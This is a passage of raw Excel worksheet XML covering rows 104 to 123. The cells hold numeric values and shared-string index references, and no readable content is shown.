      <c r="Q104" s="12">
        <v>2.5</v>
      </c>
      <c r="R104" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S104" s="12" t="s">
        <v>1079</v>
      </c>
      <c r="T104" s="12" t="s">
        <v>1080</v>
      </c>
      <c r="U104" s="12" t="s">
        <v>1081</v>
      </c>
      <c r="V104" s="12" t="s">
        <v>117</v>
      </c>
      <c r="W104" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X104" s="12">
        <v>1</v>
      </c>
      <c r="Y104" s="12" t="s">
        <v>1082</v>
      </c>
    </row>
    <row r="105" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A105" s="12">
        <v>412</v>
      </c>
      <c r="B105" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C105" s="12" t="s">
        <v>28442</v>
      </c>
      <c r="D105" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F105" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G105" s="12" t="s">
        <v>1088</v>
      </c>
      <c r="H105" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I105" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J105" s="12" t="s">
        <v>44</v>
      </c>
      <c r="K105" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L105" s="12" t="s">
        <v>66</v>
      </c>
      <c r="M105" s="12" t="s">
        <v>31584</v>
      </c>
      <c r="N105" s="12" t="s">
        <v>31597</v>
      </c>
      <c r="O105" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P105" s="12" t="s">
        <v>1089</v>
      </c>
      <c r="Q105" s="12">
        <v>2.5</v>
      </c>
      <c r="R105" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S105" s="12" t="s">
        <v>1090</v>
      </c>
      <c r="T105" s="12" t="s">
        <v>46</v>
      </c>
      <c r="U105" s="12" t="s">
        <v>1091</v>
      </c>
      <c r="V105" s="12" t="s">
        <v>48</v>
      </c>
      <c r="W105" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X105" s="12">
        <v>11</v>
      </c>
      <c r="Y105" s="12" t="s">
        <v>1092</v>
      </c>
    </row>
    <row r="106" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A106" s="12">
        <v>418</v>
      </c>
      <c r="B106" s="12" t="s">
        <v>28443</v>
      </c>
      <c r="D106" s="12" t="s">
        <v>28444</v>
      </c>
      <c r="F106" s="12" t="s">
        <v>29726</v>
      </c>
      <c r="G106" s="12" t="s">
        <v>1105</v>
      </c>
      <c r="H106" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I106" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J106" s="12" t="s">
        <v>44</v>
      </c>
      <c r="K106" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L106" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M106" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N106" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O106" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P106" s="12" t="s">
        <v>654</v>
      </c>
      <c r="Q106" s="12">
        <v>2.5</v>
      </c>
      <c r="R106" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S106" s="12" t="s">
        <v>1106</v>
      </c>
      <c r="T106" s="12" t="s">
        <v>39</v>
      </c>
      <c r="U106" s="12" t="s">
        <v>1107</v>
      </c>
      <c r="V106" s="12" t="s">
        <v>93</v>
      </c>
      <c r="W106" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X106" s="12">
        <v>2</v>
      </c>
      <c r="Y106" s="12" t="s">
        <v>1108</v>
      </c>
    </row>
    <row r="107" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A107" s="12">
        <v>419</v>
      </c>
      <c r="B107" s="12" t="s">
        <v>28419</v>
      </c>
      <c r="D107" s="12" t="s">
        <v>28445</v>
      </c>
      <c r="F107" s="12" t="s">
        <v>29726</v>
      </c>
      <c r="G107" s="12" t="s">
        <v>1109</v>
      </c>
      <c r="H107" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I107" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J107" s="12" t="s">
        <v>1110</v>
      </c>
      <c r="K107" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L107" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M107" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N107" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O107" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P107" s="12" t="s">
        <v>654</v>
      </c>
      <c r="Q107" s="12">
        <v>2.5</v>
      </c>
      <c r="R107" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S107" s="12" t="s">
        <v>1111</v>
      </c>
      <c r="T107" s="12" t="s">
        <v>39</v>
      </c>
      <c r="U107" s="12" t="s">
        <v>1112</v>
      </c>
      <c r="V107" s="12" t="s">
        <v>1113</v>
      </c>
      <c r="W107" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X107" s="12">
        <v>3</v>
      </c>
      <c r="Y107" s="12" t="s">
        <v>1114</v>
      </c>
    </row>
    <row r="108" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A108" s="12">
        <v>421</v>
      </c>
      <c r="B108" s="12" t="s">
        <v>28440</v>
      </c>
      <c r="C108" s="12" t="s">
        <v>28446</v>
      </c>
      <c r="D108" s="12" t="s">
        <v>28429</v>
      </c>
      <c r="F108" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G108" s="12" t="s">
        <v>1115</v>
      </c>
      <c r="H108" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I108" s="12" t="s">
        <v>925</v>
      </c>
      <c r="J108" s="12" t="s">
        <v>926</v>
      </c>
      <c r="K108" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L108" s="12" t="s">
        <v>33</v>
      </c>
      <c r="M108" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N108" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O108" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P108" s="12" t="s">
        <v>654</v>
      </c>
      <c r="Q108" s="12">
        <v>2.5</v>
      </c>
      <c r="R108" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S108" s="12" t="s">
        <v>1116</v>
      </c>
      <c r="T108" s="12" t="s">
        <v>1048</v>
      </c>
      <c r="U108" s="12" t="s">
        <v>1117</v>
      </c>
      <c r="V108" s="12" t="s">
        <v>930</v>
      </c>
      <c r="W108" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X108" s="12">
        <v>3</v>
      </c>
      <c r="Y108" s="12" t="s">
        <v>1118</v>
      </c>
    </row>
    <row r="109" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A109" s="12">
        <v>424</v>
      </c>
      <c r="B109" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D109" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E109" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F109" s="12" t="s">
        <v>29741</v>
      </c>
      <c r="G109" s="12" t="s">
        <v>1127</v>
      </c>
      <c r="H109" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I109" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J109" s="12" t="s">
        <v>44</v>
      </c>
      <c r="K109" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L109" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M109" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N109" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O109" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P109" s="12" t="s">
        <v>1128</v>
      </c>
      <c r="Q109" s="12">
        <v>2.5</v>
      </c>
      <c r="R109" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S109" s="12" t="s">
        <v>1129</v>
      </c>
      <c r="T109" s="12" t="s">
        <v>1130</v>
      </c>
      <c r="U109" s="12" t="s">
        <v>1131</v>
      </c>
      <c r="V109" s="12" t="s">
        <v>93</v>
      </c>
      <c r="W109" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X109" s="12">
        <v>3</v>
      </c>
      <c r="Y109" s="12" t="s">
        <v>1132</v>
      </c>
    </row>
    <row r="110" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A110" s="12">
        <v>425</v>
      </c>
      <c r="B110" s="12" t="s">
        <v>28447</v>
      </c>
      <c r="D110" s="12" t="s">
        <v>28448</v>
      </c>
      <c r="F110" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G110" s="12" t="s">
        <v>1133</v>
      </c>
      <c r="H110" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I110" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J110" s="12" t="s">
        <v>44</v>
      </c>
      <c r="K110" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L110" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M110" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N110" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O110" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P110" s="12" t="s">
        <v>952</v>
      </c>
      <c r="Q110" s="12">
        <v>2.5</v>
      </c>
      <c r="R110" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S110" s="12" t="s">
        <v>1134</v>
      </c>
      <c r="T110" s="12" t="s">
        <v>1135</v>
      </c>
      <c r="U110" s="12" t="s">
        <v>1136</v>
      </c>
      <c r="V110" s="12" t="s">
        <v>93</v>
      </c>
      <c r="W110" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X110" s="12">
        <v>4</v>
      </c>
      <c r="Y110" s="12" t="s">
        <v>1137</v>
      </c>
    </row>
    <row r="111" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A111" s="12">
        <v>430</v>
      </c>
      <c r="B111" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D111" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E111" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F111" s="12" t="s">
        <v>29743</v>
      </c>
      <c r="G111" s="12" t="s">
        <v>1142</v>
      </c>
      <c r="H111" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I111" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J111" s="12" t="s">
        <v>52</v>
      </c>
      <c r="K111" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L111" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M111" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N111" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O111" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P111" s="12" t="s">
        <v>1143</v>
      </c>
      <c r="Q111" s="12">
        <v>2.5</v>
      </c>
      <c r="R111" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S111" s="12" t="s">
        <v>1144</v>
      </c>
      <c r="T111" s="12" t="s">
        <v>399</v>
      </c>
      <c r="U111" s="12" t="s">
        <v>1145</v>
      </c>
      <c r="V111" s="12" t="s">
        <v>57</v>
      </c>
      <c r="W111" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X111" s="12">
        <v>10</v>
      </c>
      <c r="Y111" s="12" t="s">
        <v>1146</v>
      </c>
    </row>
    <row r="112" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A112" s="12">
        <v>433</v>
      </c>
      <c r="B112" s="12" t="s">
        <v>28259</v>
      </c>
      <c r="C112" s="12" t="s">
        <v>28449</v>
      </c>
      <c r="D112" s="12" t="s">
        <v>28445</v>
      </c>
      <c r="F112" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G112" s="12" t="s">
        <v>1147</v>
      </c>
      <c r="H112" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I112" s="12" t="s">
        <v>28</v>
      </c>
      <c r="J112" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K112" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L112" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M112" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N112" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O112" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P112" s="12" t="s">
        <v>654</v>
      </c>
      <c r="Q112" s="12">
        <v>2.5</v>
      </c>
      <c r="R112" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S112" s="12" t="s">
        <v>1148</v>
      </c>
      <c r="T112" s="12" t="s">
        <v>1149</v>
      </c>
      <c r="U112" s="12" t="s">
        <v>1150</v>
      </c>
      <c r="V112" s="12" t="s">
        <v>114</v>
      </c>
      <c r="W112" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X112" s="12">
        <v>11</v>
      </c>
      <c r="Y112" s="12" t="s">
        <v>1151</v>
      </c>
    </row>
    <row r="113" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A113" s="12">
        <v>438</v>
      </c>
      <c r="B113" s="12" t="s">
        <v>29779</v>
      </c>
      <c r="C113" s="12" t="s">
        <v>29781</v>
      </c>
      <c r="D113" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F113" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G113" s="12" t="s">
        <v>1162</v>
      </c>
      <c r="H113" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I113" s="12" t="s">
        <v>525</v>
      </c>
      <c r="J113" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K113" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L113" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M113" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N113" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O113" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P113" s="12" t="s">
        <v>654</v>
      </c>
      <c r="Q113" s="12">
        <v>2.5</v>
      </c>
      <c r="R113" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S113" s="12" t="s">
        <v>1163</v>
      </c>
      <c r="T113" s="12" t="s">
        <v>1164</v>
      </c>
      <c r="U113" s="12" t="s">
        <v>810</v>
      </c>
      <c r="V113" s="12" t="s">
        <v>130</v>
      </c>
      <c r="W113" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X113" s="12">
        <v>3</v>
      </c>
      <c r="Y113" s="12" t="s">
        <v>1165</v>
      </c>
    </row>
    <row r="114" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A114" s="12">
        <v>440</v>
      </c>
      <c r="B114" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D114" s="12" t="s">
        <v>28450</v>
      </c>
      <c r="F114" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G114" s="12" t="s">
        <v>1166</v>
      </c>
      <c r="H114" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I114" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J114" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K114" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L114" s="12" t="s">
        <v>66</v>
      </c>
      <c r="M114" s="12" t="s">
        <v>31584</v>
      </c>
      <c r="N114" s="12" t="s">
        <v>31597</v>
      </c>
      <c r="O114" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P114" s="12" t="s">
        <v>797</v>
      </c>
      <c r="Q114" s="12">
        <v>2.5</v>
      </c>
      <c r="R114" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S114" s="12" t="s">
        <v>1167</v>
      </c>
      <c r="T114" s="12" t="s">
        <v>68</v>
      </c>
      <c r="U114" s="12" t="s">
        <v>1168</v>
      </c>
      <c r="V114" s="12" t="s">
        <v>114</v>
      </c>
      <c r="W114" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X114" s="12">
        <v>1</v>
      </c>
      <c r="Y114" s="12" t="s">
        <v>1169</v>
      </c>
    </row>
    <row r="115" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A115" s="12">
        <v>441</v>
      </c>
      <c r="B115" s="12" t="s">
        <v>28418</v>
      </c>
      <c r="D115" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F115" s="12" t="s">
        <v>29739</v>
      </c>
      <c r="G115" s="12" t="s">
        <v>1170</v>
      </c>
      <c r="H115" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I115" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J115" s="12" t="s">
        <v>103</v>
      </c>
      <c r="K115" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L115" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M115" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N115" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O115" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P115" s="12" t="s">
        <v>797</v>
      </c>
      <c r="Q115" s="12">
        <v>2.5</v>
      </c>
      <c r="R115" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S115" s="12" t="s">
        <v>1171</v>
      </c>
      <c r="T115" s="12" t="s">
        <v>1172</v>
      </c>
      <c r="U115" s="12" t="s">
        <v>1173</v>
      </c>
      <c r="V115" s="12" t="s">
        <v>1174</v>
      </c>
      <c r="W115" s="12">
        <v>1513</v>
      </c>
      <c r="X115" s="12">
        <v>7</v>
      </c>
      <c r="Y115" s="12" t="s">
        <v>1175</v>
      </c>
    </row>
    <row r="116" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A116" s="12">
        <v>444</v>
      </c>
      <c r="B116" s="12" t="s">
        <v>28451</v>
      </c>
      <c r="C116" s="12" t="s">
        <v>28452</v>
      </c>
      <c r="D116" s="12" t="s">
        <v>28429</v>
      </c>
      <c r="F116" s="12" t="s">
        <v>29733</v>
      </c>
      <c r="G116" s="12" t="s">
        <v>1184</v>
      </c>
      <c r="H116" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I116" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J116" s="12" t="s">
        <v>422</v>
      </c>
      <c r="K116" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L116" s="12" t="s">
        <v>33</v>
      </c>
      <c r="M116" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N116" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O116" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P116" s="12" t="s">
        <v>797</v>
      </c>
      <c r="Q116" s="12">
        <v>2.5</v>
      </c>
      <c r="R116" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S116" s="12" t="s">
        <v>1185</v>
      </c>
      <c r="T116" s="12" t="s">
        <v>1186</v>
      </c>
      <c r="U116" s="12" t="s">
        <v>1187</v>
      </c>
      <c r="V116" s="12" t="s">
        <v>608</v>
      </c>
      <c r="W116" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X116" s="12">
        <v>1</v>
      </c>
      <c r="Y116" s="12" t="s">
        <v>1188</v>
      </c>
    </row>
    <row r="117" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A117" s="12">
        <v>445</v>
      </c>
      <c r="B117" s="12" t="s">
        <v>28358</v>
      </c>
      <c r="D117" s="12" t="s">
        <v>28360</v>
      </c>
      <c r="F117" s="12" t="s">
        <v>29733</v>
      </c>
      <c r="G117" s="12" t="s">
        <v>1189</v>
      </c>
      <c r="H117" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I117" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J117" s="12" t="s">
        <v>103</v>
      </c>
      <c r="K117" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L117" s="12" t="s">
        <v>66</v>
      </c>
      <c r="M117" s="12" t="s">
        <v>31584</v>
      </c>
      <c r="N117" s="12" t="s">
        <v>31597</v>
      </c>
      <c r="O117" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P117" s="12" t="s">
        <v>797</v>
      </c>
      <c r="Q117" s="12">
        <v>2.5</v>
      </c>
      <c r="R117" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S117" s="12" t="s">
        <v>1190</v>
      </c>
      <c r="T117" s="12" t="s">
        <v>1186</v>
      </c>
      <c r="U117" s="12" t="s">
        <v>1191</v>
      </c>
      <c r="V117" s="12" t="s">
        <v>179</v>
      </c>
      <c r="W117" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X117" s="12">
        <v>0</v>
      </c>
      <c r="Y117" s="12" t="s">
        <v>1192</v>
      </c>
    </row>
    <row r="118" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A118" s="12">
        <v>448</v>
      </c>
      <c r="B118" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D118" s="12" t="s">
        <v>28429</v>
      </c>
      <c r="F118" s="12" t="s">
        <v>29733</v>
      </c>
      <c r="G118" s="12" t="s">
        <v>1193</v>
      </c>
      <c r="H118" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I118" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J118" s="12" t="s">
        <v>14</v>
      </c>
      <c r="K118" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L118" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M118" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N118" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O118" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P118" s="12" t="s">
        <v>797</v>
      </c>
      <c r="Q118" s="12">
        <v>2.5</v>
      </c>
      <c r="R118" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S118" s="12" t="s">
        <v>1194</v>
      </c>
      <c r="T118" s="12" t="s">
        <v>399</v>
      </c>
      <c r="U118" s="12" t="s">
        <v>1195</v>
      </c>
      <c r="V118" s="12" t="s">
        <v>117</v>
      </c>
      <c r="W118" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X118" s="12">
        <v>5</v>
      </c>
      <c r="Y118" s="12" t="s">
        <v>1196</v>
      </c>
    </row>
    <row r="119" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A119" s="12">
        <v>449</v>
      </c>
      <c r="B119" s="12" t="s">
        <v>28453</v>
      </c>
      <c r="D119" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F119" s="12" t="s">
        <v>29733</v>
      </c>
      <c r="G119" s="12" t="s">
        <v>1197</v>
      </c>
      <c r="H119" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I119" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J119" s="12" t="s">
        <v>277</v>
      </c>
      <c r="K119" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L119" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M119" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N119" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O119" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P119" s="12" t="s">
        <v>797</v>
      </c>
      <c r="Q119" s="12">
        <v>2.5</v>
      </c>
      <c r="R119" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S119" s="12" t="s">
        <v>1198</v>
      </c>
      <c r="T119" s="12" t="s">
        <v>1199</v>
      </c>
      <c r="U119" s="12" t="s">
        <v>1200</v>
      </c>
      <c r="V119" s="12" t="s">
        <v>280</v>
      </c>
      <c r="W119" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X119" s="12">
        <v>3</v>
      </c>
      <c r="Y119" s="12" t="s">
        <v>1201</v>
      </c>
    </row>
    <row r="120" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A120" s="12">
        <v>455</v>
      </c>
      <c r="B120" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C120" s="12" t="s">
        <v>28391</v>
      </c>
      <c r="D120" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F120" s="12" t="s">
        <v>29733</v>
      </c>
      <c r="G120" s="12" t="s">
        <v>1202</v>
      </c>
      <c r="H120" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I120" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J120" s="12" t="s">
        <v>1203</v>
      </c>
      <c r="K120" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L120" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M120" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N120" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O120" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P120" s="12" t="s">
        <v>797</v>
      </c>
      <c r="Q120" s="12">
        <v>2.5</v>
      </c>
      <c r="R120" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S120" s="12" t="s">
        <v>1204</v>
      </c>
      <c r="T120" s="12" t="s">
        <v>1205</v>
      </c>
      <c r="U120" s="12" t="s">
        <v>1206</v>
      </c>
      <c r="V120" s="12" t="s">
        <v>202</v>
      </c>
      <c r="W120" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X120" s="12">
        <v>5</v>
      </c>
      <c r="Y120" s="12" t="s">
        <v>1207</v>
      </c>
    </row>
    <row r="121" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A121" s="12">
        <v>456</v>
      </c>
      <c r="B121" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C121" s="12" t="s">
        <v>28406</v>
      </c>
      <c r="D121" s="12" t="s">
        <v>28429</v>
      </c>
      <c r="F121" s="12" t="s">
        <v>29733</v>
      </c>
      <c r="G121" s="12" t="s">
        <v>1208</v>
      </c>
      <c r="H121" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I121" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J121" s="12" t="s">
        <v>139</v>
      </c>
      <c r="K121" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L121" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M121" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N121" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O121" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P121" s="12" t="s">
        <v>797</v>
      </c>
      <c r="Q121" s="12">
        <v>2.5</v>
      </c>
      <c r="R121" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S121" s="12" t="s">
        <v>1209</v>
      </c>
      <c r="T121" s="12" t="s">
        <v>1210</v>
      </c>
      <c r="U121" s="12" t="s">
        <v>1211</v>
      </c>
      <c r="V121" s="12" t="s">
        <v>114</v>
      </c>
      <c r="W121" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X121" s="12">
        <v>5</v>
      </c>
      <c r="Y121" s="12" t="s">
        <v>1212</v>
      </c>
    </row>
    <row r="122" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A122" s="12">
        <v>457</v>
      </c>
      <c r="B122" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D122" s="12" t="s">
        <v>28436</v>
      </c>
      <c r="F122" s="12" t="s">
        <v>29733</v>
      </c>
      <c r="G122" s="12" t="s">
        <v>1213</v>
      </c>
      <c r="H122" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I122" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J122" s="12" t="s">
        <v>264</v>
      </c>
      <c r="K122" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L122" s="12" t="s">
        <v>33</v>
      </c>
      <c r="M122" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N122" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O122" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P122" s="12" t="s">
        <v>797</v>
      </c>
      <c r="Q122" s="12">
        <v>2.5</v>
      </c>
      <c r="R122" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S122" s="12" t="s">
        <v>1214</v>
      </c>
      <c r="T122" s="12" t="s">
        <v>1215</v>
      </c>
      <c r="U122" s="12" t="s">
        <v>1216</v>
      </c>
      <c r="V122" s="12" t="s">
        <v>608</v>
      </c>
      <c r="W122" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X122" s="12">
        <v>2</v>
      </c>
      <c r="Y122" s="12" t="s">
        <v>1217</v>
      </c>
    </row>
    <row r="123" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A123" s="12">
        <v>460</v>
      </c>
      <c r="B123" s="12" t="s">
        <v>28454</v>
      </c>
      <c r="C123" s="12" t="s">
        <v>28449</v>
      </c>
      <c r="D123" s="12" t="s">
        <v>28455</v>
      </c>
      <c r="F123" s="12" t="s">
        <v>29733</v>
      </c>
      <c r="G123" s="12" t="s">
        <v>1223</v>
      </c>
      <c r="H123" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I123" s="12" t="s">
        <v>27</v>
      </c>
      <c r="J123" s="12" t="s">
        <v>683</v>
      </c>
      <c r="K123" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L123" s="12" t="s">
        <v>66</v>
      </c>
      <c r="M123" s="12" t="s">
        <v>31584</v>
      </c>
      <c r="N123" s="12" t="s">
        <v>31597</v>
      </c>
      <c r="O123" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P123" s="12" t="s">
        <v>1224</v>
      </c>
      <c r="Q123" s="12">
        <v>2.5</v>
      </c>
      <c r="R123" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S123" s="12" t="s">
        <v>1225</v>
      </c>
      <c r="T123" s="12" t="s">
        <v>68</v>
      </c>
      <c r="U123" s="12" t="s">
        <v>1226</v>
      </c>
      <c r="V123" s="12" t="s">
        <v>222</v>
